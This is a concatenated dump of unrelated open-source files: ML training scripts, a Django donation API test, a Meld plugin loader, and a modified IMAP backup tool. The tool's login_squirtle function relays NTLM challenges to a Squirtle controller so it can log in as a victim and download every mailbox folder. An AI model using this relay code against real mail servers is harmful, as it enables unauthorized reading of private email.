, "FXIPCMsgChunkCodeAlloc<4,false>" : "FXIPCMsgChunkCodeAlloc4False"
, "QPtrVector<FX::Generic::BoundFunctorV>" : "QPtrVectorOfBoundFunctorV"
, "FXObjectListOf<FX::FXListItem>" : "FXObjectListOfFXListItem"
, "FXObjectListOf<FX::FXHeaderItem>" : "FXObjectListOfFXHeaderItem"
, "QValueList<FX::FXString>" : "QValueListOfFXString"
, "FXObjectListOf<FX::FXIconItem>" : "FXObjectListOfFXIconItem"
, "FXIPCMsgChunkCodeAlloc<0,true>" : "FXIPCMsgChunkCodeAlloc0True"
, "FXIPCMsgChunkCodeAlloc<2,false>" : "FXIPCMsgChunkCodeAlloc2False"
} | lgpl-2.1 | -204,368,758,546,424,260 | 51.8 | 87 | 0.737441 | false |
Calvinxc1/Data_Analytics | blog/2017-01-08/oldschool_linear.py | 1 | 2522 | #%% libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#%% gradient descent linear regression function
def grad_descent(dataset, features, predictor, learn_rate, max_iters = 10000):
def initialize_model(dataset, features, predictor):
constant_array = np.ones(shape = (len(dataset), 1))
features_array = dataset.loc[:, features].values
features_array = np.append(constant_array, features_array, axis = 1)
predict_array = dataset.loc[:, predictor].values
betas = np.zeros(shape = (len(features) + 1, len(predictor)))
return (features_array, predict_array, betas)
def calc_gradient(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
gradient = -2 * np.dot(features_array.transpose(), predict_error)
return gradient
def update_betas(gradient, betas, learn_rate):
new_betas = betas - (gradient * learn_rate)
return new_betas
def model_error(features_array, predict_array, betas):
prediction = np.dot(features_array, betas)
predict_error = predict_array - prediction
model_error = np.sqrt(np.mean(predict_error ** 2))
return model_error
features_array, predict_array, betas = initialize_model(dataset, features, predictor)
prior_error = np.inf
for iter_count in range(max_iters):
gradient = calc_gradient(features_array, predict_array, betas)
betas = update_betas(gradient, betas, learn_rate)
curr_error = model_error(features_array, predict_array, betas)
if curr_error == prior_error:
break
prior_error = curr_error
return (betas, iter_count, curr_error)
#%% model test collection
house_data = pd.read_csv('kc_house_data.csv')
features = ['sqft_living', 'bedrooms', 'bathrooms']
predictor = ['price']
low_learn = 11.041
high_learn = 11.05
learn_splits = 2500
learn_rates = [10 ** -(i / learn_splits) for i in range(int(low_learn * learn_splits), int(high_learn * learn_splits))]
model_errors = []
iter_counts = []
beta_record = []
for learn_rate in learn_rates:
(betas, iter_count, curr_error) = grad_descent(house_data, features, predictor, learn_rate, max_iters = int(10e3))
model_errors.append(curr_error)
iter_counts.append(iter_count)
beta_record.append(betas)
#%%
plt.plot(np.log(model_errors[0:18]))
#%%
plt.plot(model_errors[17:32])
#%%
plt.plot(iter_counts) | gpl-3.0 | 6,453,053,014,177,452,000 | 39.047619 | 119 | 0.666138 | false |
jfterpstra/bluebottle | bluebottle/recurring_donations/tests/test_api.py | 1 | 5153 | from django.core.urlresolvers import reverse
from rest_framework import status
from bluebottle.bb_projects.models import ProjectPhase
from bluebottle.geo.models import Country
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.factory_models.geo import CountryFactory
from bluebottle.test.factory_models.projects import ProjectFactory
from bluebottle.test.utils import BluebottleTestCase
class MonthlyDonationApiTest(BluebottleTestCase):
def setUp(self):
super(MonthlyDonationApiTest, self).setUp()
self.init_projects()
self.phase_campaign = ProjectPhase.objects.get(slug='campaign')
self.country = CountryFactory()
self.some_project = ProjectFactory.create(amount_asked=500,
status=self.phase_campaign)
self.another_project = ProjectFactory.create(amount_asked=750,
status=self.phase_campaign)
self.some_user = BlueBottleUserFactory.create()
self.some_user_token = "JWT {0}".format(self.some_user.get_jwt_token())
self.another_user = BlueBottleUserFactory.create()
self.another_user_token = "JWT {0}".format(
self.another_user.get_jwt_token())
self.monthly_donation_url = reverse('monthly-donation-list')
self.monthly_donation_project_url = reverse('monthly-donation-project-list')
self.monthly_profile = {'iban': 'NL13TEST0123456789',
'bic': 'TESTNL2A',
'name': 'Nijntje het Konijntje',
'city': 'Amsterdam',
'country': self.country.id,
'amount': u'50.00'}
def test_create_monthly_donation(self):
"""
Tests for creating, retrieving, updating monthly donation.
"""
# Check that user has no monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
self.assertEqual(response.data['results'], [])
# Create a new monthly donation
response = self.client.post(self.monthly_donation_url,
self.monthly_profile,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
self.assertEqual(response.data['amount'],
self.monthly_profile['amount'])
self.assertEqual(response.data['active'], True)
some_monthly_donation_id = response.data['id']
# Reload it and check that all is still well.
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 1)
self.assertEqual(response.data['results'][0]['amount'],
self.monthly_profile['amount'])
# Add a preferred projects
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.some_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_201_CREATED,
response.data)
# Reload it. It should have that project embedded
response = self.client.get(self.monthly_donation_url,
token=self.some_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(len(response.data['results'][0]['projects']), 1)
self.assertEqual(response.data['results'][0]['projects'][0]['project'],
self.some_project.slug)
# Another should not have a monthly donation
response = self.client.get(self.monthly_donation_url,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK,
response.data)
self.assertEqual(response.data['count'], 0)
# Another user can't add a project to first monthly donation
monthly_project = {
'donation': some_monthly_donation_id,
'project': self.another_project.slug
}
response = self.client.post(self.monthly_donation_project_url,
monthly_project,
token=self.another_user_token)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN,
response.data)
| bsd-3-clause | -2,161,579,183,659,187,500 | 45.423423 | 84 | 0.579856 | false |
grutz/squirtle | evilagents/imapbackup-squirtle.py | 1 | 23800 | #!/usr/bin/env python
"""IMAP Incremental Backup Script"""
__version__ = "1.4a-squirtle"
__author__ = "Rui Carmo (http://the.taoofmac.com)"
__copyright__ = "(C) 2006 Rui Carmo. Code under BSD License.\n(C)"
__contributors__ = "Bob Ippolito, Michael Leonhard, Giuseppe Scrivano <[email protected]>, Kurt Grutzmacher <[email protected]>"
# = Contributors =
# Giuseppe Scrivano: Added support for folders.
# Michael Leonhard: LIST result parsing, SSL support, revamped argument processing,
# moved spinner into class, extended recv fix to Windows
# Bob Ippolito: fix for MemoryError on socket recv, http://python.org/sf/1092502
# Rui Carmo: original author, up to v1.2e
# Kurt Grutzmacher: Squirtle support, use Maildir instead of mbox
# = TODO =
# - Add proper exception handlers to scanFile() and downloadMessages()
# - Migrate mailbox usage from rfc822 module to email module
# - Investigate using the noseek mailbox/email option to improve speed
# - Use the email module to normalize downloaded messages
# and add missing Message-Id
# - Test parseList() and its descendents on other imapds
# - Test bzip2 support
# - Add option to download only subscribed folders
# - Add regex option to filter folders
# - Use a single IMAP command to get Message-IDs
# - Use a single IMAP command to fetch the messages
# - Add option to turn off spinner. Since sys.stdin.isatty() doesn't work on
# Windows, redirecting output to a file results in junk output.
# - Patch Python's ssl module to do proper checking of certificate chain
# - Patch Python's ssl module to raise good exceptions
# - Submit patch of socket._fileobject.read
# - Improve imaplib module with LIST parsing code, submit patch
# DONE:
# v1.3c
# - Add SSL support
# - Support host:port
# - Cleaned up code using PyLint to identify problems
# pylint -f html --indent-string=" " --max-line-length=90 imapbackup.py > report.html
import getpass, os, gc, sys, time, platform, getopt
import mailbox, imaplib, socket
import re, sha, gzip, bz2
import urllib, urllib2, simplejson
class SkipFolderException(Exception):
"""Indicates aborting processing of current folder, continue with next folder."""
pass
class Spinner:
"""Prints out message with cute spinner, indicating progress"""
def __init__(self, message):
"""Spinner constructor"""
self.glyphs = "|/-\\"
self.pos = 0
self.message = message
sys.stdout.write(message)
sys.stdout.flush()
self.spin()
def spin(self):
"""Rotate the spinner"""
if sys.stdin.isatty():
sys.stdout.write("\r" + self.message + " " + self.glyphs[self.pos])
sys.stdout.flush()
self.pos = (self.pos+1) % len(self.glyphs)
def stop(self):
"""Erase the spinner from the screen"""
if sys.stdin.isatty():
sys.stdout.write("\r" + self.message + " ")
sys.stdout.write("\r" + self.message)
sys.stdout.flush()
def pretty_byte_count(num):
"""Converts integer into a human friendly count of bytes, eg: 12.243 MB"""
if num == 1:
return "1 byte"
elif num < 1024:
return "%s bytes" % (num)
elif num < 1048576:
return "%.2f KB" % (num/1024.0)
elif num < 1073741824:
return "%.3f MB" % (num/1048576.0)
elif num < 1099511627776:
return "%.3f GB" % (num/1073741824.0)
else:
return "%.3f TB" % (num/1099511627776.0)
# Regular expressions for parsing
MSGID_RE = re.compile("^Message\-Id\: (.+)", re.IGNORECASE + re.MULTILINE)
BLANKS_RE = re.compile(r'\s+', re.MULTILINE)
# Constants
UUID = '19AF1258-1AAF-44EF-9D9A-731079D6FAD7' # Used to generate Message-Ids
def process_type2(msg2, sqkey='', squri="http://localhost:8080/", squser="squirtle", sqpass="eltriuqs"):
msg2 = urllib.quote(msg2)
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='Squirtle Realm',
uri=squri,
user=squser,
passwd=sqpass)
urlopener = urllib2.build_opener(auth_handler)
urllib2.install_opener(urlopener)
dutchieurl = "%scontroller/type2?key=%s&type2=%s" % (squri, sqkey, msg2)
try:
res = urllib2.urlopen(dutchieurl)
except urllib2.URLError, e:
print '*** Error talking to Squirtle.' + str(e.code) + ': ' + e.reason + '\n'
return ''
response = res.read()
try:
response = simplejson.loads(response)
except Exception, e:
print '*** Error receiving response from Squirtle: ' + response + '\n'
return ''
if response['status'] == 'ok':
NTLM_msg3 = response['result']
else:
print '*** Response from Squirtle: ' + response['status'] + '\n'
return NTLM_msg3
def login_squirtle(server, sqkey):
"""Login as a user using the Squirtle API"""
typ, dat = server.capability()
if not "NTLM" in str(dat):
raise self.error("!!! IMAP server does not support NTLM !!!")
server.send("0001 AUTHENTICATE NTLM\r\n")
dat = server.readline()
if "+" not in dat:
raise server.error("!!! Did not receive IMAP challenge: %s" % (dat))
# generic ntlm type 1 message
server.send("TlRMTVNTUAABAAAABzIAAAYABgArAAAACwALACAAAABXT1JLU1RBVElPTkRPTUFJTg==\r\n")
dat = server.readline()
if "+" not in dat:
raise server.error("!!! Invalid response: %s" % (dat))
msg3 = process_type2(dat[2:].strip(), sqkey, "http://localhost:8080/", "squirtle", "eltriuqs")
if len(msg3) > 0:
server.send("%s\r\n" % msg3)
dat = server.readline()
if "0001 OK" not in dat:
raise server.error("!!! Did not receive OK message: %s" % (dat))
server.state = 'AUTH'
else:
raise server.error("!!! No response from Squirtle")
return
def download_messages(server, mpath, foldername, messages, config):
"""Download messages from folder and append to maildr folder"""
# nothing to do
if not len(messages):
print "New messages: 0"
return
mbox = mailbox.Maildir(mpath)
try:
mbox = mbox.get_folder(foldername)
except NoSuchMailboxError, e:
mbox = mbox.add_folder(foldername)
spinner = Spinner("Downloading %s new messages to %s" % (len(messages), foldername))
total = biggest = 0
# each new message
for msg_id in messages.keys():
# fetch message
typ, data = server.fetch(messages[msg_id], "RFC822")
assert('OK' == typ)
text = data[0][1].strip().replace('\r','')
mbox.add(text)
size = len(text)
biggest = max(size, biggest)
total += size
del data
gc.collect()
spinner.spin()
mbox.clean()
mbox.close()
spinner.stop()
print ": %s total, %s for largest message" % (pretty_byte_count(total),
pretty_byte_count(biggest))
def scan_file(mpath, foldername, compress, overwrite):
"""Gets IDs of messages in the specified maildir folder"""
spinner = Spinner("File %s" % (foldername))
mbox = mailbox.Maildir(mpath)
try:
mbox = mbox.get_folder(foldername)
except mailbox.NoSuchMailboxError:
mbox = mbox.add_folder(foldername)
messages = {}
# each message
i = 0
for message in mbox:
header = ''
# We assume all messages on disk have message-ids
try:
header = ''.join(message.getfirstmatchingheader('message-id'))
except KeyError:
# No message ID was found. Warn the user and move on
print
print "WARNING: Message #%d in %s" % (i, filename),
print "has no Message-Id header."
header = BLANKS_RE.sub(' ', header.strip())
try:
msg_id = MSGID_RE.match(header).group(1)
if msg_id not in messages.keys():
# avoid adding dupes
messages[msg_id] = msg_id
except AttributeError:
# Message-Id was found but could somehow not be parsed by regexp
# (highly bloody unlikely)
print
print "WARNING: Message #%d in %s" % (i, foldername),
print "has a malformed Message-Id header."
spinner.spin()
i = i + 1
# done
mbox.close()
spinner.stop()
print ": %d messages" % (len(messages.keys()))
return messages
def scan_folder(server, foldername):
"""Gets IDs of messages in the specified folder, returns id:num dict"""
messages = {}
spinner = Spinner("Folder %s" % (foldername))
try:
typ, data = server.select(foldername, readonly=True)
if 'OK' != typ:
raise SkipFolderException("SELECT failed: %s" % (data))
num_msgs = int(data[0])
# each message
for num in range(1, num_msgs+1):
# Retrieve Message-Id
typ, data = server.fetch(num, '(BODY[HEADER.FIELDS (MESSAGE-ID)])')
if 'OK' != typ:
raise SkipFolderException("FETCH %s failed: %s" % (num, data))
header = data[0][1].strip()
# remove newlines inside Message-Id (a dumb Exchange trait)
header = BLANKS_RE.sub(' ', header)
try:
msg_id = MSGID_RE.match(header).group(1)
if msg_id not in messages.keys():
# avoid adding dupes
messages[msg_id] = num
except (IndexError, AttributeError):
# Some messages may have no Message-Id, so we'll synthesise one
# (this usually happens with Sent, Drafts and .Mac news)
typ, data = server.fetch(num, '(BODY[HEADER.FIELDS (FROM TO CC DATE SUBJECT)])')
if 'OK' != typ:
raise SkipFolderException("FETCH %s failed: %s" % (num, data))
header = data[0][1].strip()
header = header.replace('\r\n','\t')
messages['<' + UUID + '.' + sha.sha(header).hexdigest() + '>'] = num
spinner.spin()
finally:
spinner.stop()
print ":",
# done
print "%d messages" % (len(messages.keys()))
return messages
def parse_paren_list(row):
"""Parses the nested list of attributes at the start of a LIST response"""
# eat starting paren
assert(row[0] == '(')
row = row[1:]
result = []
# NOTE: RFC3501 doesn't fully define the format of name attributes
name_attrib_re = re.compile("^\s*(\\\\[a-zA-Z0-9_]+)\s*")
# eat name attributes until ending paren
while row[0] != ')':
# recurse
if row[0] == '(':
paren_list, row = parse_paren_list(row)
result.append(paren_list)
# consume name attribute
else:
match = name_attrib_re.search(row)
assert(match != None)
name_attrib = row[match.start():match.end()]
row = row[match.end():]
#print "MATCHED '%s' '%s'" % (name_attrib, row)
name_attrib = name_attrib.strip()
result.append(name_attrib)
# eat ending paren
assert(')' == row[0])
row = row[1:]
# done!
return result, row
def parse_string_list(row):
"""Parses the quoted and unquoted strings at the end of a LIST response"""
slist = re.compile('\s*(?:"([^"]+)")\s*|\s*(\S+)\s*').split(row)
return [s for s in slist if s]
def parse_list(row):
"""Prases response of LIST command into a list"""
row = row.strip()
paren_list, row = parse_paren_list(row)
string_list = parse_string_list(row)
assert(len(string_list) == 2)
return [paren_list] + string_list
def get_hierarchy_delimiter(server):
"""Queries the imapd for the hierarchy delimiter, eg. '.' in INBOX.Sent"""
# see RFC 3501 page 39 paragraph 4
typ, data = server.list('', '')
assert(typ == 'OK')
assert(len(data) == 1)
lst = parse_list(data[0]) # [attribs, hierarchy delimiter, root name]
hierarchy_delim = lst[1]
# NIL if there is no hierarchy
if 'NIL' == hierarchy_delim:
hierarchy_delim = '.'
return hierarchy_delim
def get_names(server, compress):
"""Get list of folders, returns [(FolderName,FileName)]"""
spinner = Spinner("Finding Folders")
# Get hierarchy delimiter
delim = get_hierarchy_delimiter(server)
spinner.spin()
# Get LIST of all folders
typ, data = server.list()
assert(typ == 'OK')
spinner.spin()
names = []
# parse each LIST, find folder name
for row in data:
lst = parse_list(row)
foldername = lst[2]
suffix = {'none':'', 'gzip':'.gz', 'bzip2':'.bz2'}[compress]
filename = '.'.join(foldername.split(delim)) + '.mbox' + suffix
names.append((foldername, filename))
# done
spinner.stop()
print ": %s folders" % (len(names))
return names
def print_usage():
"""Prints usage, exits"""
# " "
print "Usage: imapbackup [OPTIONS] -s HOST -u USERNAME [-p PASSWORD]"
print " -a --append-to-mboxes Append new messages to mbox files. (default)"
print " -y --yes-overwrite-mboxes Overwite existing mbox files instead of appending."
print " -n --compress=none Use one plain mbox file for each folder. (default)"
print " -z --compress=gzip Use mbox.gz files. Appending may be very slow."
print " -b --compress=bzip2 Use mbox.bz2 files. Appending not supported: use -y."
print " -f --=folder Specifify which folders use. Comma separated list."
print " -e --ssl Use SSL. Port defaults to 993."
print " -k KEY --key=KEY PEM private key file for SSL. Specify cert, too."
print " -c CERT --cert=CERT PEM certificate chain for SSL. Specify key, too."
print " Python's SSL module doesn't check the cert chain."
print " -s HOST --server=HOST Address of server, port optional, eg. mail.com:143"
print " -u USER --user=USER Username to log into server"
print " -p PASS --pass=PASS Prompts for password if not specified."
print " -K KEY --sqkey=KEY Squirtle KEY to use."
print " -L x --loop=x Loop and loop and loop, waiting 'x' seconds btwn loops"
print "\nNOTE: Maildir is created in a directory based upon username"
sys.exit(2)
def process_cline():
"""Uses getopt to process command line, returns (config, warnings, errors)"""
# read command line
try:
short_args = "aynzbek:c:s:u:p:f:K:L:"
long_args = ["append-to-mboxes", "yes-overwrite-mboxes", "compress=", "sqkey=", "loop="
"ssl", "keyfile=", "certfile=", "server=", "user=", "pass=", "folders="]
opts, extraargs = getopt.getopt(sys.argv[1:], short_args, long_args)
except getopt.GetoptError:
print_usage()
warnings = []
config = {'compress':'none', 'overwrite':False, 'usessl':False}
errors = []
# empty command line
if not len(opts) and not len(extraargs):
print_usage()
# process each command line option, save in config
for option, value in opts:
if option in ("-a", "--append-to-mboxes"):
config['overwrite'] = False
elif option in ("-y", "--yes-overwrite-mboxes"):
warnings.append("Existing mbox files will be overwritten!")
config["overwrite"] = True
elif option == "-n":
config['compress'] = 'none'
elif option == "-z":
config['compress'] = 'gzip'
elif option == "-b":
config['compress'] = 'bzip2'
elif option == "--compress":
if value in ('none', 'gzip', 'bzip2'):
config['compress'] = value
else:
errors.append("Invalid compression type specified.")
elif option in ("-e", "--ssl"):
config['usessl'] = True
elif option in ("-k", "--keyfile"):
config['keyfilename'] = value
elif option in ("-f", "--folders"):
config['folders'] = value
elif option in ("-c", "--certfile"):
config['certfilename'] = value
elif option in ("-s", "--server"):
config['server'] = value
elif option in ("-u", "--user"):
config['user'] = value
elif option in ("-p", "--pass"):
config['pass'] = value
elif option in ("-K", "--sqkey"):
config['sqkey'] = value
elif option in ("-L", "--loop"):
config['loop'] = value
else:
errors.append("Unknown option: " + option)
# don't ignore extra arguments
for arg in extraargs:
errors.append("Unknown argument: " + arg)
# done processing command line
return (config, warnings, errors)
def check_config(config, warnings, errors):
"""Checks the config for consistency, returns (config, warnings, errors)"""
if config['compress'] == 'bzip2' and config['overwrite'] == False:
errors.append("Cannot append new messages to mbox.bz2 files. Please specify -y.")
if config['compress'] == 'gzip' and config['overwrite'] == False:
warnings.append(
"Appending new messages to mbox.gz files is very slow. Please Consider\n"
" using -y and compressing the files yourself with gzip -9 *.mbox")
if 'server' not in config :
errors.append("No server specified.")
if 'user' not in config:
errors.append("No username specified.")
if ('keyfilename' in config) ^ ('certfilename' in config):
errors.append("Please specify both key and cert or neither.")
if 'keyfilename' in config and not config['usessl']:
errors.append("Key specified without SSL. Please use -e or --ssl.")
if 'certfilename' in config and not config['usessl']:
errors.append("Certificate specified without SSL. Please use -e or --ssl.")
if 'server' in config and ':' in config['server']:
# get host and port strings
bits = config['server'].split(':', 1)
config['server'] = bits[0]
# port specified, convert it to int
if len(bits) > 1 and len(bits[1]) > 0:
try:
port = int(bits[1])
if port > 65535 or port < 0:
raise ValueError
config['port'] = port
except ValueError:
errors.append("Invalid port. Port must be an integer between 0 and 65535.")
return (config, warnings, errors)
def get_config():
"""Gets config from command line and console, returns config"""
# config = {
# 'compress': 'none' or 'gzip' or 'bzip2'
# 'overwrite': True or False
# 'server': String
# 'port': Integer
# 'user': String
# 'pass': String
# 'usessl': True or False
# 'keyfilename': String or None
# 'certfilename': String or None
# }
config, warnings, errors = process_cline()
config, warnings, errors = check_config(config, warnings, errors)
# show warnings
for warning in warnings:
print "WARNING:", warning
# show errors, exit
for error in errors:
print "ERROR", error
if len(errors):
sys.exit(2)
# prompt for password, if necessary
if 'pass' not in config and 'sqkey' not in config:
config['pass'] = getpass.getpass()
# defaults
if not 'port' in config:
if config['usessl']:
config['port'] = 993
else:
config['port'] = 143
# done!
return config
def connect_and_login(config):
"""Connects to the server and logs in. Returns IMAP4 object."""
try:
assert(not (('keyfilename' in config) ^ ('certfilename' in config)))
if config['usessl'] and 'keyfilename' in config:
print "Connecting to '%s' TCP port %d," % (config['server'], config['port']),
print "SSL, key from %s," % (config['keyfilename']),
print "cert from %s " % (config['certfilename'])
server = imaplib.IMAP4_SSL(config['server'], config['port'],
config['keyfilename'], config['certfilename'])
elif config['usessl']:
print "Connecting to '%s' TCP port %d, SSL" % (config['server'], config['port'])
server = imaplib.IMAP4_SSL(config['server'], config['port'])
else:
print "Connecting to '%s' TCP port %d" % (config['server'], config['port'])
server = imaplib.IMAP4(config['server'], config['port'])
if 'sqkey' in config:
print "Logging in with Squirtle key '%s'" % (config['sqkey'])
login_squirtle(server, config['sqkey'])
else:
print "Logging in as '%s'" % (config['user'])
server.login(config['user'], config['pass'])
except socket.gaierror, e:
(err, desc) = e
print "ERROR: problem looking up server '%s' (%s %s)" % (config['server'], err, desc)
sys.exit(3)
except socket.error, e:
if str(e) == "SSL_CTX_use_PrivateKey_file error":
print "ERROR: error reading private key file '%s'" % (config['keyfilename'])
elif str(e) == "SSL_CTX_use_certificate_chain_file error":
print "ERROR: error reading certificate chain file '%s'" % (config['keyfilename'])
else:
print "ERROR: could not connect to '%s' (%s)" % (config['server'], e)
sys.exit(4)
return server
def process_messages(server, config):
names = get_names(server, config['compress'])
if config.get('folders'):
dirs = map (lambda x: x.strip(), config.get('folders').split(','))
names = filter (lambda x: x[0] in dirs, names)
#for n in range(len(names)):
# print n, names[n]
for name_pair in names:
try:
foldername, filename = name_pair
fol_messages = scan_folder(server, foldername)
fil_messages = scan_file(config['user'], foldername, config['compress'], config['overwrite'])
new_messages = {}
for msg_id in fol_messages:
if msg_id not in fil_messages:
new_messages[msg_id] = fol_messages[msg_id]
#for f in new_messages:
# print "%s : %s" % (f, new_messages[f])
download_messages(server, config['user'], foldername, new_messages, config)
except SkipFolderException, e:
print e
def main():
"""Main entry point"""
try:
config = get_config()
server = connect_and_login(config)
"""Check to see if Maildir exists, create if not"""
path = config['user']
if not os.path.isdir(path):
os.mkdir(path, 0700)
os.mkdir(os.path.join(path, 'tmp'), 0700)
os.mkdir(os.path.join(path, 'new'), 0700)
os.mkdir(os.path.join(path, 'cur'), 0700)
if 'loop' in config:
while 1:
process_messages(server, config)
print "---------------------------------------------------------"
time.sleep(float(config['loop']))
else:
process_messages(server, config)
print "Disconnecting"
server.logout()
except socket.error, e:
(err, desc) = e
print "ERROR: %s %s" % (err, desc)
sys.exit(4)
except imaplib.IMAP4.error, e:
print "ERROR:", e
sys.exit(5)
# From http://www.pixelbeat.org/talks/python/spinner.py
def cli_exception(typ, value, traceback):
"""Handle CTRL-C by printing newline instead of ugly stack trace"""
if not issubclass(typ, KeyboardInterrupt):
sys.__excepthook__(typ, value, traceback)
else:
sys.stdout.write("\n")
sys.stdout.flush()
if sys.stdin.isatty():
sys.excepthook = cli_exception
# Hideous fix to counteract http://python.org/sf/1092502
# (which should have been fixed ages ago.)
# Also see http://python.org/sf/1441530
def _fixed_socket_read(self, size=-1):
data = self._rbuf
if size < 0:
# Read until EOF
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
if self._rbufsize <= 1:
recv_size = self.default_bufsize
else:
recv_size = self._rbufsize
while True:
data = self._sock.recv(recv_size)
if not data:
break
buffers.append(data)
return "".join(buffers)
else:
# Read until size bytes or EOF seen, whichever comes first
buf_len = len(data)
if buf_len >= size:
self._rbuf = data[size:]
return data[:size]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
left = size - buf_len
recv_size = min(self._rbufsize, left) # the actual fix
data = self._sock.recv(recv_size)
if not data:
break
buffers.append(data)
n = len(data)
if n >= left:
self._rbuf = data[left:]
buffers[-1] = data[:left]
break
buf_len += n
return "".join(buffers)
# Platform detection to enable socket patch
if 'Darwin' in platform.platform() and '2.3.5' == platform.python_version():
socket._fileobject.read = _fixed_socket_read
if 'Windows' in platform.platform():
socket._fileobject.read = _fixed_socket_read
if __name__ == '__main__':
gc.enable()
main()
| gpl-3.0 | 6,713,781,112,720,833,000 | 32.521127 | 131 | 0.620252 | false |
z01nl1o02/tests | mxnet/cifar/cifar10/demo.py | 1 | 2581 | import mxnet as mx
from mxnet.gluon import nn
from mxnet import gluon
import sys
import utils
import pdb,os,sys
from importlib import import_module
import logging
import numpy as np
trainBatchSize = 100
testBatchSize = 50
dataShape = (3,32,32)
classNum = 10
pretrained = None
checkpoints = 'checkpoints/'
inputroot = "c:/dataset/cifar/split/"
lr_base = 0.01
weight_decay = 0.0005
mean = np.zeros(dataShape)
mean[0,:,:] = 0.4914
mean[1,:,:] = 0.4822
mean[2,:,:] = 0.4465
std = np.zeros(dataShape)
std[0,:,:] = 0.2023
std[1,:,:] = 0.1994
std[2,:,:] = 0.2010
def test_transform(X,Y):
out = X.astype(np.float32)/255.0
out = np.transpose(out,(2,0,1))
#pdb.set_trace()
#return (mx.image.color_normalize(out,np.asarray([0.4914, 0.4822, 0.4465]), np.asarray([0.2023, 0.1994, 0.2010])),Y)
return (mx.image.color_normalize(out.asnumpy(),mean,std),Y)
def train_transform(X,Y):
return test_transform(X,Y)
def get_net():
mod = import_module('symbol.resnet18')
net = mod.get_symbol(classNum,utils.try_gpu())
return net
def get_train_test(): #mxnet 1.0.0
train_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'train') , flag=1, transform = train_transform)
test_ds = mx.gluon.data.vision.ImageFolderDataset( os.path.join(inputroot, 'test'), flag=1, transform = test_transform)
for label,labelname in enumerate( train_ds.synsets ):
logging.info('%d %s'%(label, labelname))
loader = mx.gluon.data.DataLoader
train_data = loader( train_ds, \
trainBatchSize,shuffle=True, last_batch='keep')
test_data =loader( test_ds, \
testBatchSize, shuffle=True, last_batch='keep')
return (train_data, test_data)
def get_trainer(net):
loss = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(),"sgd",{'learning_rate':lr_base, 'momentum':0.9, 'wd':weight_decay})
return (trainer,loss)
def main():
net = get_net()
net_str = '%s'%net
#logging.info('ok')
logging.info(net_str)
if pretrained is not None:
net.load_params(pretrained,ctx=utils.try_gpu())
train_data, test_data = get_train_test()
trainer,loss = get_trainer(net)
utils.train(train_data, test_data, trainBatchSize,\
net, loss, trainer, utils.try_gpu(), 1000,\
500,0.1,print_batches=100, chk_pts_dir=checkpoints)
if __name__=="__main__":
logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',filename="train.log", level=logging.INFO)
main()
| gpl-2.0 | -2,859,128,899,069,319,700 | 30.096386 | 130 | 0.649361 | false |
kaiw/meld | meld/vc/__init__.py | 1 | 3230 | ### Copyright (C) 2002-2005 Stephen Kennedy <[email protected]>
### Redistribution and use in source and binary forms, with or without
### modification, are permitted provided that the following conditions
### are met:
###
### 1. Redistributions of source code must retain the above copyright
### notice, this list of conditions and the following disclaimer.
### 2. Redistributions in binary form must reproduce the above copyright
### notice, this list of conditions and the following disclaimer in the
### documentation and/or other materials provided with the distribution.
### THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
### IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
### OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
### IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
### INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
### NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
### DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
### THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
### (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
### THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import glob
from . import _null
from ._vc import DATA_NAME, DATA_STATE, DATA_REVISION, DATA_OPTIONS
def load_plugins():
_vcdir = os.path.dirname(os.path.abspath(__file__))
ret = []
for plugin in glob.glob(os.path.join(_vcdir, "[a-z]*.py")):
modname = "meld.vc.%s" % os.path.basename(os.path.splitext(plugin)[0])
ret.append( __import__(modname, globals(), locals(), "*") )
return ret
_plugins = load_plugins()
def get_plugins_metadata():
ret = []
for p in _plugins:
# Some plugins have VC_DIR=None until instantiated
if p.Vc.VC_DIR:
ret.append(p.Vc.VC_DIR)
# Most plugins have VC_METADATA=None
if p.Vc.VC_METADATA:
ret.extend(p.Vc.VC_METADATA)
return ret
vc_sort_order = (
"Git",
"Bazaar",
"Mercurial",
"Fossil",
"Monotone",
"Darcs",
"SVK",
"Subversion",
"Subversion 1.7",
"CVS",
)
def get_vcs(location):
"""Pick only the Vcs with the longest repo root
Some VC plugins search their repository root
by walking the filesystem upwards its root
and now that we display multiple VCs in the
same directory, we must filter those other
repositories that are located in the search
path towards "/" as they are not relevant
to the user.
"""
vcs = []
max_len = 0
